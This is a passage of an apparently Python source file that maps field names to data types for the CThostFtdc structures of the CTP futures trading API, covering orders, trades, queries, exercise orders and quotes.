"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"OrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OrderSysID": "string",
"OrderSource": "char",
"OrderStatus": "char",
"OrderType": "char",
"VolumeTraded": "int",
"VolumeTotal": "int",
"InsertDate": "string",
"InsertTime": "string",
"ActiveTime": "string",
"SuspendTime": "string",
"UpdateTime": "string",
"CancelTime": "string",
"ActiveTraderID": "string",
"ClearingPartID": "string",
"SequenceNo": "int",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderInsertErrorField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcInputOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderActionField = {
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderActionErrorField = {
"ExchangeID": "string",
"OrderSysID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcExchangeTradeField = {
"ExchangeID": "string",
"TradeID": "string",
"Direction": "char",
"OrderSysID": "string",
"ParticipantID": "string",
"ClientID": "string",
"TradingRole": "char",
"ExchangeInstID": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"Price": "double",
"Volume": "int",
"TradeDate": "string",
"TradeTime": "string",
"TradeType": "char",
"PriceSource": "char",
"TraderID": "string",
"OrderLocalID": "string",
"ClearingPartID": "string",
"BusinessUnit": "string",
"SequenceNo": "int",
"TradeSource": "char",
}
CThostFtdcTradeField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"ExchangeID": "string",
"TradeID": "string",
"Direction": "char",
"OrderSysID": "string",
"ParticipantID": "string",
"ClientID": "string",
"TradingRole": "char",
"ExchangeInstID": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"Price": "double",
"Volume": "int",
"TradeDate": "string",
"TradeTime": "string",
"TradeType": "char",
"PriceSource": "char",
"TraderID": "string",
"OrderLocalID": "string",
"ClearingPartID": "string",
"BusinessUnit": "string",
"SequenceNo": "int",
"TradingDay": "string",
"SettlementID": "int",
"BrokerOrderSeq": "int",
"TradeSource": "char",
"InvestUnitID": "string",
}
CThostFtdcUserSessionField = {
"FrontID": "int",
"SessionID": "int",
"BrokerID": "string",
"UserID": "string",
"LoginDate": "string",
"LoginTime": "string",
"IPAddress": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"LoginRemark": "string",
}
CThostFtdcQueryMaxOrderVolumeField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"Direction": "char",
"OffsetFlag": "char",
"HedgeFlag": "char",
"MaxVolume": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcSettlementInfoConfirmField = {
"BrokerID": "string",
"InvestorID": "string",
"ConfirmDate": "string",
"ConfirmTime": "string",
"SettlementID": "int",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcSyncDepositField = {
"DepositSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"Deposit": "double",
"IsForce": "int",
"CurrencyID": "string",
}
CThostFtdcSyncFundMortgageField = {
"MortgageSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"FromCurrencyID": "string",
"MortgageAmount": "double",
"ToCurrencyID": "string",
}
CThostFtdcBrokerSyncField = {
"BrokerID": "string",
}
CThostFtdcSyncingInvestorField = {
"InvestorID": "string",
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorName": "string",
"IdentifiedCardType": "char",
"IdentifiedCardNo": "string",
"IsActive": "int",
"Telephone": "string",
"Address": "string",
"OpenDate": "string",
"Mobile": "string",
"CommModelID": "string",
"MarginModelID": "string",
}
CThostFtdcSyncingTradingCodeField = {
"InvestorID": "string",
"BrokerID": "string",
"ExchangeID": "string",
"ClientID": "string",
"IsActive": "int",
"ClientIDType": "char",
}
CThostFtdcSyncingInvestorGroupField = {
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorGroupName": "string",
}
CThostFtdcSyncingTradingAccountField = {
"BrokerID": "string",
"AccountID": "string",
"PreMortgage": "double",
"PreCredit": "double",
"PreDeposit": "double",
"PreBalance": "double",
"PreMargin": "double",
"InterestBase": "double",
"Interest": "double",
"Deposit": "double",
"Withdraw": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CurrMargin": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"Balance": "double",
"Available": "double",
"WithdrawQuota": "double",
"Reserve": "double",
"TradingDay": "string",
"SettlementID": "int",
"Credit": "double",
"Mortgage": "double",
"ExchangeMargin": "double",
"DeliveryMargin": "double",
"ExchangeDeliveryMargin": "double",
"ReserveBalance": "double",
"CurrencyID": "string",
"PreFundMortgageIn": "double",
"PreFundMortgageOut": "double",
"FundMortgageIn": "double",
"FundMortgageOut": "double",
"FundMortgageAvailable": "double",
"MortgageableFund": "double",
"SpecProductMargin": "double",
"SpecProductFrozenMargin": "double",
"SpecProductCommission": "double",
"SpecProductFrozenCommission": "double",
"SpecProductPositionProfit": "double",
"SpecProductCloseProfit": "double",
"SpecProductPositionProfitByAlg": "double",
"SpecProductExchangeMargin": "double",
"FrozenSwap": "double",
"RemainSwap": "double",
}
CThostFtdcSyncingInvestorPositionField = {
"InstrumentID": "string",
"BrokerID": "string",
"InvestorID": "string",
"PosiDirection": "char",
"HedgeFlag": "char",
"PositionDate": "char",
"YdPosition": "int",
"Position": "int",
"LongFrozen": "int",
"ShortFrozen": "int",
"LongFrozenAmount": "double",
"ShortFrozenAmount": "double",
"OpenVolume": "int",
"CloseVolume": "int",
"OpenAmount": "double",
"CloseAmount": "double",
"PositionCost": "double",
"PreMargin": "double",
"UseMargin": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"PreSettlementPrice": "double",
"SettlementPrice": "double",
"TradingDay": "string",
"SettlementID": "int",
"OpenCost": "double",
"ExchangeMargin": "double",
"CombPosition": "int",
"CombLongFrozen": "int",
"CombShortFrozen": "int",
"CloseProfitByDate": "double",
"CloseProfitByTrade": "double",
"TodayPosition": "int",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"StrikeFrozen": "int",
"StrikeFrozenAmount": "double",
"AbandonFrozen": "int",
"ExchangeID": "string",
"YdStrikeFrozen": "int",
"InvestUnitID": "string",
}
CThostFtdcSyncingInstrumentMarginRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"IsRelative": "int",
}
CThostFtdcSyncingInstrumentCommissionRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
}
CThostFtdcSyncingInstrumentTradingRightField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"TradingRight": "char",
}
CThostFtdcQryOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"OrderSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcQryTradeField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"TradeID": "string",
"TradeTimeStart": "string",
"TradeTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInvestorPositionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryTradingAccountField = {
"BrokerID": "string",
"InvestorID": "string",
"CurrencyID": "string",
"BizType": "char",
"AccountID": "string",
}
CThostFtdcQryInvestorField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcQryTradingCodeField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
"ClientID": "string",
"ClientIDType": "char",
"InvestUnitID": "string",
}
CThostFtdcQryInvestorGroupField = {
"BrokerID": "string",
}
CThostFtdcQryInstrumentMarginRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInstrumentCommissionRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInstrumentTradingRightField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcQryBrokerField = {
"BrokerID": "string",
}
CThostFtdcQryTraderField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
}
CThostFtdcQrySuperUserFunctionField = {
"UserID": "string",
}
CThostFtdcQryUserSessionField = {
"FrontID": "int",
"SessionID": "int",
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcQryPartBrokerField = {
"ExchangeID": "string",
"BrokerID": "string",
"ParticipantID": "string",
}
CThostFtdcQryFrontStatusField = {
"FrontID": "int",
}
CThostFtdcQryExchangeOrderField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQryOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcQryExchangeOrderActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQrySuperUserField = {
"UserID": "string",
}
CThostFtdcQryExchangeField = {
"ExchangeID": "string",
}
CThostFtdcQryProductField = {
"ProductID": "string",
"ProductClass": "char",
"ExchangeID": "string",
}
CThostFtdcQryInstrumentField = {
"InstrumentID": "string",
"ExchangeID": "string",
"ExchangeInstID": "string",
"ProductID": "string",
}
CThostFtdcQryDepthMarketDataField = {
"InstrumentID": "string",
"ExchangeID": "string",
}
CThostFtdcQryBrokerUserField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcQryBrokerUserFunctionField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcQryTraderOfferField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
}
CThostFtdcQrySyncDepositField = {
"BrokerID": "string",
"DepositSeqNo": "string",
}
CThostFtdcQrySettlementInfoField = {
"BrokerID": "string",
"InvestorID": "string",
"TradingDay": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcQryExchangeMarginRateField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"ExchangeID": "string",
}
CThostFtdcQryExchangeMarginRateAdjustField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
}
CThostFtdcQryExchangeRateField = {
"BrokerID": "string",
"FromCurrencyID": "string",
"ToCurrencyID": "string",
}
CThostFtdcQrySyncFundMortgageField = {
"BrokerID": "string",
"MortgageSeqNo": "string",
}
CThostFtdcQryHisOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"OrderSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"TradingDay": "string",
"SettlementID": "int",
}
CThostFtdcOptionInstrMiniMarginField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"MinMargin": "double",
"ValueMethod": "char",
"IsRelative": "int",
}
CThostFtdcOptionInstrMarginAdjustField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"SShortMarginRatioByMoney": "double",
"SShortMarginRatioByVolume": "double",
"HShortMarginRatioByMoney": "double",
"HShortMarginRatioByVolume": "double",
"AShortMarginRatioByMoney": "double",
"AShortMarginRatioByVolume": "double",
"IsRelative": "int",
"MShortMarginRatioByMoney": "double",
"MShortMarginRatioByVolume": "double",
}
CThostFtdcOptionInstrCommRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
"StrikeRatioByMoney": "double",
"StrikeRatioByVolume": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcOptionInstrTradeCostField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"FixedMargin": "double",
"MiniMargin": "double",
"Royalty": "double",
"ExchFixedMargin": "double",
"ExchMiniMargin": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryOptionInstrTradeCostField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"InputPrice": "double",
"UnderlyingPrice": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryOptionInstrCommRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcIndexPriceField = {
"BrokerID": "string",
"InstrumentID": "string",
"ClosePrice": "double",
}
CThostFtdcInputExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExecOrderRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcInputExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExecOrderActionRef": "int",
"ExecOrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExecOrderRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExecOrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"ExecOrderSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerExecOrderSeq": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExecOrderActionRef": "int",
"ExecOrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"ExecOrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"ActionType": "char",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
}
CThostFtdcExchangeExecOrderField = {
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExecOrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"ExecOrderSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeExecOrderField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQryExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcExchangeExecOrderActionField = {
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"ExecOrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"ActionType": "char",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ExchangeInstID": "string",
"Volume": "int",
}
CThostFtdcQryExchangeExecOrderActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcErrExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExecOrderRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"OffsetFlag": "char",
"HedgeFlag": "char",
"ActionType": "char",
"PosiDirection": "char",
"ReservePositionFlag": "char",
"CloseFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryErrExecOrderField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcErrExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExecOrderActionRef": "int",
"ExecOrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ExecOrderSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryErrExecOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcOptionInstrTradingRightField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"Direction": "char",
"TradingRight": "char",
}
CThostFtdcQryOptionInstrTradingRightField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"Direction": "char",
}
CThostFtdcInputForQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ForQuoteRef": "string",
"UserID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcForQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ForQuoteRef": "string",
"UserID": "string",
"ForQuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"InsertDate": "string",
"InsertTime": "string",
"ForQuoteStatus": "char",
"FrontID": "int",
"SessionID": "int",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerForQutoSeq": "int",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryForQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcExchangeForQuoteField = {
"ForQuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"InsertDate": "string",
"InsertTime": "string",
"ForQuoteStatus": "char",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeForQuoteField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcInputQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"QuoteRef": "string",
"UserID": "string",
"AskPrice": "double",
"BidPrice": "double",
"AskVolume": "int",
"BidVolume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"AskOffsetFlag": "char",
"BidOffsetFlag": "char",
"AskHedgeFlag": "char",
"BidHedgeFlag": "char",
"AskOrderRef": "string",
"BidOrderRef": "string",
"ForQuoteSysID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcInputQuoteActionField = {
"BrokerID": "string",
"InvestorID": "string",
"QuoteActionRef": "int",
"QuoteRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"QuoteSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"QuoteRef": "string",
"UserID": "string",
"AskPrice": "double",
"BidPrice": "double",
"AskVolume": "int",
"BidVolume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"AskOffsetFlag": "char",
"BidOffsetFlag": "char",
"AskHedgeFlag": "char",
"BidHedgeFlag": "char",
"QuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"NotifySequence": "int",
"OrderSubmitStatus": "char",
"TradingDay": "string",
"SettlementID": "int",
"QuoteSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"QuoteStatus": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"AskOrderSysID": "string",
"BidOrderSysID": "string",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerQuoteSeq": "int",
"AskOrderRef": "string",
"BidOrderRef": "string",
"ForQuoteSysID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQuoteActionField = {
"BrokerID": "string",
"InvestorID": "string",
"QuoteActionRef": "int",
"QuoteRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"QuoteSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"QuoteLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryQuoteField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"QuoteSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
"InvestUnitID": "string",
}
CThostFtdcExchangeQuoteField = {
"AskPrice": "double",
"BidPrice": "double",
"AskVolume": "int",
"BidVolume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"AskOffsetFlag": "char",
"BidOffsetFlag": "char",
"AskHedgeFlag": "char",
"BidHedgeFlag": "char",
"QuoteLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"NotifySequence": "int",
"OrderSubmitStatus": "char",
"TradingDay": "string",
"SettlementID": "int",
"QuoteSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"QuoteStatus": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"AskOrderSysID": "string",
"BidOrderSysID": "string",
"ForQuoteSysID": "string",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeQuoteField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcQryQuoteActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcExchangeQuoteActionField = {
"ExchangeID": "string",
"QuoteSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"QuoteLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryExchangeQuoteActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcOptionInstrDeltaField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"Delta": "double",
}
CThostFtdcForQuoteRspField = {
"TradingDay": "string",
"InstrumentID": "string",
"ForQuoteSysID": "string",
"ForQuoteTime": "string",
"ActionDay": "string",
"ExchangeID": "string",
}
CThostFtdcStrikeOffsetField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"Offset": "double",
"OffsetType": "char",
}
CThostFtdcQryStrikeOffsetField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcInputBatchOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"UserID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcBatchOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeBatchOrderActionField = {
"ExchangeID": "string",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
